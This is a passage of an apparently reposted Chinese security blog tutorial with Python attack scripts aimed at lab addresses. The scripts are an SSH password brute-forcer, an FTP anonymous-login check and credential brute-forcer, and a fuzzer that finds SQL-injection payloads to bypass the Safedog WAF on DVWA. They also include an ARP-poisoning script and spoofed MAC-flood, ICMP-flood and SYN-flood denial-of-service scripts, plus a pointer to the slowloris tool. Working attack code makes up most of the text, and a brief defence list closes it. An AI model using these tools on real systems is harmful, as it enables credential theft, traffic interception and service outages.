SSH(SecureShell)是目前较可靠、专为远程登录会话和其他网络服务提供安全性的协议,主要用于给远程登录会话数据进行加密,保证数据传输的安全。🇸SH口令长度太短或者复杂度不够,如仅包含数字🔢或仅包含字母🔤等时,容易被🤺攻击者破解。口令—旦被🤺攻击者获取,将可用来直接登录系统,控制服务器的所有权限!
SSH主要应用于类UNIX系统中,从客户端来看, SSH提供两种级别的安全验证:1️基于密码的安全验证、2️⃣基于密钥🗝️的安全验证.
from pexpect import pxssh
import optparse
from threading import*
Max_Connect =5
connection_lock = BoundedSemaphore(value=Max_Connect)# BoundedSemaphore 限制多进程访问defconnect(host, user, password):try:
s = pxssh.pxssh()#pxssh不支持Windows
s.login(host, user, password)print("[+]Password Found:"+password)
Found =Trueexcept Exception as e:passdefmain():
parser = optparse.OptionParser('usage %prog -H <target host> -f <passwd file> -u <username>')
parser.add_option('-H', dest='host',type='string',help='target host')
parser.add_option('-f', dest='passwdfile',type='string',help='passwofile')
parser.add_option('-u', dest='user',type='string',help='login username')(options,args)= parser.parse_args()
host = options.host
passwdfile = options.passwdfile
user = options.user
if host==Noneor passwdfile==Noneor user==None:print(parser.usage)
exit(0)
mn =open(passwdfile,'r')
lines = mn.readlines()for line in lines:with connection_lock:
password = line.strip('\n')print('[-] Test:'+str(password))
t = Thread(target=connect,args=(host, user, password))
t.start()if __name__ =='__main__':
main()
FTP暴力破解
1️FTP是一个文件传输协议,用户通过🇫TP可从客户机程序向远程主机上传或下载文件,常用于网站代码维护、日常源码备份等。如果攻击者🤺通过🇫TP匿名访问或者通过弱口令破解获取FTP权限,将可直接上传📤WebShell来进一步渗透提权,直至控制整个网站服务器。
2️FTP是基于🇹CP的,🇫TP的命令端口为21,数据端口为20。🇫TP的任务是将一台💻的文件传送到另一台💻上。在使用🇫TP前需要进行身份验证,验证通过后才能获得相应的权限。
import ftplib
# 检查FTP是否允许匿名账户登录defCheckFTP_login(hostname):
f = ftplib.FTP(hostname)try:print('[-] checking user [anonymous] with password [anonymous]')
f.connect(hostname,21,timeout=10)
f.login()print("\n[+] Credentials have found succcessfully.")print("\n[+] Username:anonymous")print("\n[+] Password:anonymous")print("success!!!username:{},password:{}".format("anonymous","anonymous"))
f.quit()except ftplib.all_errors:print("\n[+] Anonymous login is prohibited!!!")pass# 爆破用户名和密码defviolence_Login(hostname):
ftp=ftplib.FTP(hostname)
u=open('ftp_user.txt','r')
lines_user=u.readlines()
usernameList =[]for m in lines_user:
usernameList=[' '.join([n.strip()for n in usr.strip().split('\t')])for usr in lines_user]
p=open('ftp_pwd.txt','r')
lines_psd=p.readlines()
passwordList =[]for m in lines_psd:
passwordList=[' '.join([n.strip()for n in psd.strip().split('\t')])for psd in lines_psd]for user in usernameList:for pasw in passwordList:try:if ftp.login(user,pasw):print("\n[+] success!!! username:{},password:{}".format(user,pasw))
ftp.quit()except:pass
CheckFTP_login('192.168.12.131')
violence_Login('192.168.12.131')
1️⃣允许匿名登录
2️⃣禁止匿名登录
八、Fuzz测试
FUZZ在渗透测试中应用广泛,可以用于硬件测试软件测试、安全测试等,是一种高效的、能快速检查潜在安全威胁的技术。
Python绕过安全狗
安全狗版本为v4.0 Apache版 + 本地DVWA-SQL Injection
常见的绕过安全🐶的方式有4种:利用string绕过、利用User-agent绕过、利用MySQL语法和html的特殊性绕过、利用畸形数据包绕过。
判断返回的页面是否为安全🐶拦截显示的页面,使用页面中返回的
攻击请求
进行判断,不存在这4个字,则表示已经绕过了安全狗。
import requests
import sys
fuzz_x =['/*','*/','/*!','/**/','?','/','*','=','`','!','@','%','_','-','+','|','%00']
fuzz_y =['',' ']
fuzz_z =["%0a","%0b","%0c","%0d","%0e","%0f","%0g"]
fuzz = fuzz_x+fuzz_y+fuzz_z
headers ={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36","Cookie":"security=low; PHPSESSID=6l0tittmdhgtpiktaffs9rqnvp"}
url_start ="http://192.168.12.131/dvwa/vulnerabilities/sqli/?id=1"len=len(fuzz)**3
num =0#组合for a in fuzz:for b in fuzz:for c in fuzz:
num +=1
payload ="'/**//*!*/and/*!*/"+a+b+c+"/**/'1'='1"
url = url_start + payload+"&Submit=Submit#"
sys.stdout.write(' '*30+'\r')
sys.stdout.flush()print("Now URL:"+url)
sys.stdout.write("完成进度:%s/%s \r"%(num,len))
sys.stdout.flush()
res = requests.get(url = url,headers = headers)if"攻击请求"notin res.text:print("\033[0;33m[*]Find BypassWAF Payload:\033[0m"+url)
🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌
九、Scapy进劫
ARP毒化
ARP(地址解析协议)是数据链路层的协议,主要负责根据网络层地址(ip)来获取数据链路层地址(MAC)。
ARP毒化虽然是一种比较老的渗透测试技术,但是在信息搜集方面能发挥出很不错的效果.通过ARP毒化技术分析并提取内网流量中的敏感信息,往往会有许多意外的"收获"。
以太网协议规定,同—局域网中的一台💻要和另一台💻进行直接通信,必须知道目标主机的MAC地址。而在TCP/IP中,网络层只关注目标主机的IP地址,这就导致在以太网中使用IP协议时,数据链路层的以太网协议接收到网络层的IP协议提供的数据中,只包含目的主机的IP地址,于是需要ARP来完成IP地址到MAC地址的转换。
ARP是建立在网络中各个主机互相信任的基础上的,主机接收到ARP应答报文时不会检测该报文的真实性,而直接将报文中的IP和MAC记入其ARP缓存表。如果ARP缓存表中有相同的地址项,则会对其进行更新。由此,攻击者🤺可以向受害主机发送伪ARP应答包,毒化受害主机的ARP缓存表。
kali的IP地址:192.168.12.128 MAC地址为:00:0c:29:c5:a5:bb
目标网关的IP地址:192.168.12.2 MAC地址为:00:50:56:e6:e8:7d
毒化前
# ARP毒化脚本from scapy.allimport*import re
import time
import sys
import os
import optparse
# 编写ARP毒化函数,对目标主机以及网关不断发送ARP应答包来不断毒化defpoison(targetIP,gatewayIP,ifname):# 毒化主机的MAC地址
targetMAC ="00:0c:29:c5:a5:bb"# 网关的MAC地址
gatewayMAC ="00:50:56:e6:e8:7d"if targetMAC and gatewayMAC:# 用while持续毒化whileTrue:# 对目标主机进行毒化
sendp(Ether(src=lmac,dst=targetMAC)/ARP(hwsrc=lmac,hwdst=targetMAC,psrc=gatewayIP,pdst=targetIP,op=2),iface=ifname,verbose=False)#对网关进行毒化
sendp(Ether(src=lmac,dst=gatewayMAC)/ARP(hwsrc=lmac,hwdst=gatewayMAC,psrc=targetIP,pdst=gatewayIP,op=2),iface=ifname,verbose=False)
time.sleep(1)else:print("目标主机/网关主机IP有误,请检查!")
sys.exit(0)# 编写main函数,添加相关参数以及开启系统路由转发功能if __name__ =='__main__':
parser = optparse.OptionParser('usage:python %prog -r targetIP -g gatewayIP -i iface \n\n')# 添加目标主机参数 -r
parser.add_option('-r','--rhost',dest='rhost',default='192.168.12.1',type='string',help='target host')# 添加网关参数 -g
parser.add_option('-g','--gateway',dest='gateway',default='192.168.1.254',type='string',help='target gateway')# 添加网卡参数 -i
parser.add_option('-i','--iface',dest='iface',default='eth0',type='string',help='interfaces name')(options,args)= parser.parse_args()
lmac = get_if_hwaddr(options.iface)
lip = get_if_addr(options.iface)print("===开始进行ARP毒化===")try:
poison(options.rhost,options.gateway,options.iface)except KeyboardInterrupt:print("===停止ARP毒化")print("===停止路由转发功能===")
os.system("echo 1 >> /proc/sys/net/ipv4/ip_forward")
os.system("sysct1 net.ipv4.ip_forward")
毒化后
Dos
拒绝服务攻击(DenialofServjce,DoS)使计算机或网络无法提供正常的服务,是黑客常用的攻击🤺手段之—。常见的DoS攻击🤺包括计算机网络带宽攻击和连通性攻击两种类型。
带宽攻击是指以极大的通信量冲击网络,使得所有可用网络资源都被消耗殆尽,最后导致合法的用户请求无法通过。
连通性攻击指用大量的连接请求冲击计算机,使得所有可用的操作系统资源都被消耗殆尽,最终导致计算机无法再处理合法的用户请求。
常用的拒绝服务攻击🤺手段包括:
同步洪流、WinNuke、死亡之PING、Echl攻击、ICMP/SMURF、Finger炸弹、Land攻击、Ping洪流、Rwhod、tearDrop、TARGA3、UDP攻击、OOB等。实际上拒绝服务攻击🤺并不是一个攻击🤺方式,而是指一类具有相似特征的攻击🤺方式。黑客可能会利用TCP/IP协议层中的数据链路层、网络层、传输层和应用层各种协议漏洞发起拒绝服务攻击🤺。
数据链路层Dos-MAC泛洪攻击
数据链路层的拒绝服务攻击其实就是通过伪造请求主机的MAC地址信息,使得交换机内部CAM短时间填满,失去交换机本身的记忆功能,退化成集线器,当接收到正常数据包时,会将全部数据以广播的形式发送出去。此时若攻击者🤺将自己的主机设置为混杂模式,就可以监听网络中的其他主机接收的数据了。
当路由器接收到包含随机生成的IP地址和MAC地址的数据包时,交换机查询CAM,若不存在该信息,就会不断进行记录。短时间内’大量请求会导致CAM被填满,失去交换机原有的功能。
from scapy.allimport*import optparse
defattack(interface):
pkt =Ether(src=RandMAC(),dst=RandMAC())/IP(src=RandIP(),dst=RandIP())/ICMP()
sendp(pkt,iface=interface)defmain():
parser =optparse.OptionParser("%prog "+"-i interface")
parser.add_option('-i',dest='interface',default='eth0',type='string',help='Interface')(options,args)=parser.parse_args()
interface = options.interface
try:whileTrue:
attack(interface)except KeyboardInterrupt:print('--------------------')print('Finished!')if __name__ =='__main__':
main()
wireshark
网络层Dos-死亡之Ping
控制多个僵尸主机一同向目标主机发送数据时,会出现"死亡之ping",使目标主机岩机.
import sys
from scapy.allimport*defstart(argv):iflen(sys.argv)<2:print(sys.argv[0]+" <target_ip>")
sys.exit(0)
psrc ="6.6.6.6"whileTrue:
pdst = sys.argv[1]
send(IP(src=psrc,dst=pdst)/ICMP())
s
if __name__ =='__main__':# 定义异常try:
start(sys.argv[1:])except KeyboardInterrupt:print("interrupted by user,killing all threads....")
传输层Dos-SYN拒绝服务攻击
1️⃣攻击者向目标计算机发送一个TCP SYN报文。
2️⃣目标计算机收到这个报文后,建立TCP连接控制结构,并回应一个ACK,等待发起者的回应。
3️⃣发起者则不向目标计算机回应ACK报文,这样导致目标计算机一直处于等待状态。
import sys
from scapy.allimport*defstart(argv):iflen(sys.argv)<2:print(sys.argv[0]+" <target_ip")
sys.exit(0)
psrc ='6.6.6.6'whileTrue:
pdst =sys.argv[1]
send(IP(src=psrc,dst=pdst)/TCP(dport=443,flag='S'))if __name__ =='__main__':# 定义异常try:
start(sys.argv[1:])except KeyboardInterrupt:print("interrupted by user, killing all threads......")
应用层Dos-Slowloris攻击
位于应用层的协议有很多,常见的包括HTTP、FTP、DNS、DHCP等。
其中应用层中的每一个协议都有可能被用来发起拒绝服务攻击。不同于其他层,应用层拒绝服务攻击已经完成了TCP的三次握手,建立起了连接,所以发起攻击🤺的IP地址都是真实的。常见的应用层拒绝服务攻击有CC(ChallengeCollapasar)攻击、Slowloris攻击、ServerLimitDOS等。
Slowloris攻击
以极低的速度向服务器发送HTTP请求。由于WebServer对于并发的连接数都有一定的上限,因此若恶意地占用这些连接不释放,那么WebServe的所有连接都将被恶意连接占用,从而无法接受新的请求,导致拒绝服务。
pip install slowloris
安装
防御策略
1️⃣关闭不需要的服务和端口,实现服务最小化,让服务器提供专门服务。
2️⃣安装查杀病毒的软硬件产品,及时更新病毒库。尽量避免因为软件漏洞而引起的拒绝服务,定期扫描现有的主机和网络节点,对安全漏洞和不规范的安全配置进行及时整改,对先前的漏洞及时打补丁。
3️⃣经常检测网络和主机的脆弱性,查看网上漏洞数据库,以减少或避免主机成为肉鸡的可能性。
4️⃣建立多节点的负载均衡,配备高于业务需求的带宽,建立多个网络出口,提高服务器的运算能力。
十、完结
🚶🚶🚶🚶🚶🚶🚶来来回回写了两星期⏰了,边学📚️边写✍️,🥦归🥦,收获很多。
明天大年初一🧨,给CSDN的大佬们拜个年🧧🧧🧧本人一名小小的网络安全爱好者,如若文章有错误和不妥之处,敬请大佬们请教指正。
版权归原作者 {Yasso} 所有, 如有侵权,请联系我们删除。